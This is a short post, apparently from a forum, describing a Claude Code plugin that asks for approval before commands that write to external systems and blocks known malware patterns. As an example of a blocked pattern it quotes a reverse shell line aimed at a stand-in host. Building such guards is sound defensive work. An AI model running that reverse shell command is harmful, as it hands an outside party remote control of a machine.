I wanted to be asked for approval iff it’d make changes in external environments or talk to a network.
I built a Claude Code plugin that: (https://postimg.cc/crvWLNRR)
1) Always prompts for “write-external” commands (db updates, API calls, remote writes), e.g. scp, curl -X POST, git push, sqlite3 etc.
2) Blocks known malware patterns like reverse shell patterns (bash -i >& /dev/tcp/attacker.com/4444 0>&1) or writing to a Dotfile
It uses a PreTool hook to lookup the command before execution from a “write-external” registry. If its missing, a haiku model reads its man / --help pages and updates registry with usage patterns where external writes can happen.
To make manual changes to a registry, you can prompt Claude to “mark mytool as safe“ or “add curl to always ask“.